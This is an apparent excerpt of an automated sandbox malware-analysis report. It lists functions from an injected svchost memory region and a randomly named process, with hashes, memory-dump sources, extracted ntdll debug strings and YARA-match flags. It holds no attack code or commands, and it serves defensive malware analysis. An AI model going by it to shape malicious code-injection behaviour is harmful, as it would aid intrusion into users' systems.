                                                                                            • Opcode ID: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                                                                            • Instruction ID: e303f57d1a5663c1869d8415abfae552c449150872fe418899db69d36fc75ad6
                                                                                            • Opcode Fuzzy Hash: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                                                                            • Instruction Fuzzy Hash: 8190022160140902D101B2584444656400F87D0341FD6C023A1024559ECF298A92A131
                                                                                            Function 03A72EE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                                                                            • Instruction ID: 241df3eaa6b3a87db98e35d66bfdd7e7a09ee1ce0026968ea7d9cd5be3f9d148
                                                                                            • Opcode Fuzzy Hash: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                                                                            • Instruction Fuzzy Hash: 9590026120180803D140B6584844647400A87D0302F96C012A2064559E8F2D8D516135
                                                                                            Function 03A72E30 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                                            • Instruction ID: 5d635efbf04ea7e90f25870dc8807114b4e00bb39f390a9a5b947059099fe3f3
                                                                                            • Opcode Fuzzy Hash: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                                            • Instruction Fuzzy Hash: 9990022130140802D102B2584454646400EC7D1345FD6C013E1424559D8B298A53A132
                                                                                            Function 03A72DB0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                                            • Instruction ID: d9e24f8b6617e462a143ba2d99d78a6a6a85e7ba63dd81d1f0a27f8a403b8dd0
                                                                                            • Opcode Fuzzy Hash: 357e3815be04e383424d7202da5bdd3256bec30c73c0ea87fea3450405d28a36
                                                                                            • Instruction Fuzzy Hash: 5990023124140802D141B2584444646400E97D0341FD6C013A0424558E8B598B56AA71
                                                                                            Function 03A72DD0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                                            • Instruction ID: 3702aab53614c89fc6c766f202ce157726bd2c79021f55c8adddd5991e8c949d
                                                                                            • Opcode Fuzzy Hash: 76a9db35322fc9f15a5f5e5c38d9b97aa2079b6956dfc159d178729138af2050
                                                                                            • Instruction Fuzzy Hash: F8900221242445525545F2584444547800B97E03417D6C013A1414954C8A2A9956D631
                                                                                            Function 03A72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                                            • Instruction ID: da7d611ebaac140cdcaa956a8a9830bc49e02b782710f09473408fd84780ea82
                                                                                            • Opcode Fuzzy Hash: 8db3b0099dde00c0ce7373548a94028dcea12e34a0f0f36300315bf1e096eb20
                                                                                            • Instruction Fuzzy Hash: A490022130140403D140B2585458646800AD7E1301F96D012E0414558CDE1989565232
                                                                                            Function 03A72D00 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                                            • Instruction ID: 202c1a662dbb0a8b21df97da26fdbef98c899174412a8f14635dcb71552abba8
                                                                                            • Opcode Fuzzy Hash: 962df8df9f84fa4dbfcd20879f6945b8480713fe2257470b93e01b3f55978ca6
                                                                                            • Instruction Fuzzy Hash: BD90022120544842D100B6585448A46400A87D0305F96D012A1064599DCB398951A131
                                                                                            Function 03A72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                                            • Instruction ID: 30d74a254c04f7e8553604c7050cade66c232875b9a70b6c2cc632ce732dcee0
                                                                                            • Opcode Fuzzy Hash: fb5a18b1fbaca51a1bb437f9345af34e51edeb33ed0e96870f1f040ef618d3e8
                                                                                            • Instruction Fuzzy Hash: B090022921340402D180B258544864A400A87D1302FD6D416A001555CCCE1989695331
                                                                                            Function 03A73D10 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                                            • Instruction ID: 672b4469694b36afb9e820c61ce8931173e1ebe7a4825f9cc632e706461aa190
                                                                                            • Opcode Fuzzy Hash: d09e79b07f4f0c9f03a70a93e72db37cb9da632792e0a7e4a2cc9686161b0c92
                                                                                            • Instruction Fuzzy Hash: B1900231202405429540B3585844A8E810A87E1302BD6D416A0015558CCE1889615231
                                                                                            Function 03A73D70 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                                            • Instruction ID: 075ed57014af68d780c9e581c0fd3fd5d9054d15b653e7f65f31ac4293f73864
                                                                                            • Opcode Fuzzy Hash: 0724a55702557b88eab522a681f65254646a936601d49c18b871fd219445dc67
                                                                                            • Instruction Fuzzy Hash: 5990023520140802D510B2585844686404B87D0301F96D412A042455CD8B5889A1A131
                                                                                            Function 03A72CA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                                            • Instruction ID: 806b039d6371e4f527156db2afec7b665d7abe141e3f5d8ac3d59411953d7dfb
                                                                                            • Opcode Fuzzy Hash: f6bbe34faf38423a2af5c2874f69607b4429775ac7edf08cb935ebffec54d0f0
                                                                                            • Instruction Fuzzy Hash: 9C90023120140802D100B6985448686400A87E0301F96D012A5024559ECB6989916131
                                                                                            Function 03A72CF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                                            • Instruction ID: 91d7a4e47c06e320ca148faec19256fb603671885ea1973d301cb26e87b3080e
                                                                                            • Opcode Fuzzy Hash: 07a98a7412d0fe01d53a863fbbd752a3e3e2cc27cdaa43e0ae0223f92ba8f990
                                                                                            • Instruction Fuzzy Hash: A390023120140803D100B2585548747400A87D0301F96D412A042455CDDB5A89516131
                                                                                            Function 03A72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                                            • Instruction ID: 6c875257121a20332aef1164de5238a92b1e09c82d1a6603dc0ec3062c1801e7
                                                                                            • Opcode Fuzzy Hash: fd0cd61c70e95480d2a22868317c37e6d12c7c3576a11faf8e072a87fbaa05e0
                                                                                            • Instruction Fuzzy Hash: 2090022160540802D140B2585458746401A87D0301F96D012A0024558DCB5D8B5566B1
                                                                                            Function 03A72C60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                                            • Instruction ID: cf8172b1e8da8ad95efb9db8a736e593390540e95d237bffdc2c3e332be5f8f9
                                                                                            • Opcode Fuzzy Hash: ba9005bb96f146622660bdcdccae020250d42037b06e37970c204efd3a20bee6
                                                                                            • Instruction Fuzzy Hash: 1490023120140C42D100B2584444B86400A87E0301F96C017A0124658D8B19C9517531
                                                                                            Function 03A72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                                            • Instruction ID: 85a7ce7d1fba9afba6edc3cc0ec763e3c3ffde9bd170bc9b91b8edcd9a3683d3
                                                                                            • Opcode Fuzzy Hash: c081755656b2c2ee4a0969a0f1751c74fcfc9b71dfa9df4a6f7a36a7b831ef4e
                                                                                            • Instruction Fuzzy Hash: 3D90023120148C02D110B258844478A400A87D0301F9AC412A442465CD8B9989917131
                                                                                            Function 03A72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: 753309e0dc3e3b2c57bf69f5c6ba90d10068aba477833187e49ad9ddd6b483c7
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Function 03A72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                                            • Instruction ID: ec548c573cde0ac30e1b9fc2c60b262bfd6e5c1b0492a2015831f35271c54223
                                                                                            • Opcode Fuzzy Hash: efdb772acde483bd6861764ebe7ee4a00185b0615d695e62262ad3eeb6309758
                                                                                            • Instruction Fuzzy Hash: 9451B6B6A04616BFCB10DB9C8DD0A7EF7F8BB09200B18856BE4A5D7641D334DE44CBA0
                                                                                            Function 03A67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03AA4787
                                                                                            • Execute=1, xrefs: 03AA4713
                                                                                            • ExecuteOptions, xrefs: 03AA46A0
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03AA4725
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03AA4655
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03AA46FC
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03AA4742
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                                            • Instruction ID: d804800f09c69c4131d25540a1b71c262a40e26422fdb78533fe97d5d351d51e
                                                                                            • Opcode Fuzzy Hash: 7620e91770c2155ed5f3670237c5494f1820e3e3002a7780dea0961e5db58653
                                                                                            • Instruction Fuzzy Hash: E0511B396103197EDF10EB69DD85FAE73BCEF09308F0801ABE505AB291E7769A418F50
                                                                                            Function 03A7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction ID: 692d9c299c65e652c387dedeb3a643475e05cd2aeb33f94cf9d3aef3ba7e780e
                                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction Fuzzy Hash: 96816BB4E062499EDF24CF68CCD17EEBBB6AF46250F1C425FD861AB391C63499408B70
                                                                                            Function 03A5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Re-Waiting, xrefs: 03AA031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AA02E7
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AA02BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            • Opcode ID: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                                            • Instruction ID: a829cdd8fd70b01a40f07c48e17ebcbf59ac56834db0bff96b6692793dc9fac0
                                                                                            • Opcode Fuzzy Hash: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                                            • Instruction Fuzzy Hash: 57E1CC31608B41DFD724CF28C984B2AB7E4BF89314F180A6EF9A58B6E1D774D944CB52
                                                                                            Function 03A6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 03AA7B8E
                                                                                            • RTL: Re-Waiting, xrefs: 03AA7BAC
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03AA7B7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            • Opcode ID: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                                            • Instruction ID: 9c081307b8ba9ad594f599379f55e6de82f50171cc0e9ed5beb7c738b348f49c
                                                                                            • Opcode Fuzzy Hash: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                                            • Instruction Fuzzy Hash: D541B2367007029FC724DF69CD40B6AB7E9EB89710F140A2EE956DB690DB71E4058BA1
                                                                                            Function 03A6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 03AA72A3
                                                                                            • RTL: Re-Waiting, xrefs: 03AA72C1
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            • Opcode ID: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                                            • Instruction ID: 0a863f17a1bc196f58818d7adb1a92f36501d85c610dbd7bd0b90e1c26c2093c
                                                                                            • Opcode Fuzzy Hash: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                                            • Instruction Fuzzy Hash: 2B41E136600706AFC724DF69CC41B6AB7A9FB94710F140A2FF855DB240DB31E81687E1
                                                                                            Function 03A77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction ID: eac62f73c55acd8fb255fd76053b445bae2821f540de45e3cc07a6c78ae7ed7e
                                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction Fuzzy Hash: 3E91A071E002169EDB24DF69CDC1ABEB7B9AF44320F58462FE865E72C0D7368942CB50
                                                                                            Function 03A39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            • Opcode ID: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                                            • Instruction ID: 2827f768d20e42e7bebd5ce388238204eb0253c011ccd7e41c5e8bbc1d3255ab
                                                                                            • Opcode Fuzzy Hash: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                                            • Instruction Fuzzy Hash: 55813A76D002699BDB31DF54CD44BEAB7B8AB48710F0445EBA90DB7680E7709E84CFA0

                                                                                            Executed Functions

                                                                                            Function 055BB1ED Relevance: 7.7, Strings: 6, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: oP{$6$O$S$\$s
                                                                                            • API String ID: 0-3955500580
                                                                                            • Opcode ID: d9a78b43525a589567d5b13a42a97470f5c31c1f51be0335d121dd6a42c6c8cb
                                                                                            • Instruction ID: e0f4b41538174f62344ffb52e76561b5980709fbbd880882943d1557c2a69e63
                                                                                            • Opcode Fuzzy Hash: d9a78b43525a589567d5b13a42a97470f5c31c1f51be0335d121dd6a42c6c8cb
                                                                                            • Instruction Fuzzy Hash: AF5160B2D01219ABEB11EFD4DD89EEEB7B8FF84714F0042D9E90956140E7B46B44CBA1
                                                                                            Function 055C985D Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: =U
                                                                                            • API String ID: 0-808517434
                                                                                            • Opcode ID: 14fae923396668484efb98fa720fab751cf0903af89031984c1531604a9cb175
                                                                                            • Instruction ID: ea4defb039b39fbb85b096fdcaa3b702b1afe013a65bd6ddd20a53311e57cb09
                                                                                            • Opcode Fuzzy Hash: 14fae923396668484efb98fa720fab751cf0903af89031984c1531604a9cb175
                                                                                            • Instruction Fuzzy Hash: 0211D3B6D01219AF9B00DFE9D9449EEBBF9FF88210F04456AE915E7200E7705A04CBA1
                                                                                            Function 055AD5A9 Relevance: .5, Instructions: 455COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a556ac8f478930ff6b9bc5ed30819794509626dc575b0c5c6f7b98c8d1557467
                                                                                            • Instruction ID: 833d7ee2447dbbee0554deaa0ef3c1564e3f469f64835f4dba526eed5a7cbeab
                                                                                            • Opcode Fuzzy Hash: a556ac8f478930ff6b9bc5ed30819794509626dc575b0c5c6f7b98c8d1557467
                                                                                            • Instruction Fuzzy Hash: 9F3204B1D05269CFEB24DF48C894BDDBBB2BB84308F1085D9D14AAB690C7B55A85CF81
                                                                                            Function 055BB02D Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0be7e711008555287c67e3fafc2d4db2926cb144c5c2ceefd3309fa08063a7e5
                                                                                            • Instruction ID: 16c62b5615ef4f89d5fe5b7002c8683945af02fe644f3545cd6730f68b7017a1
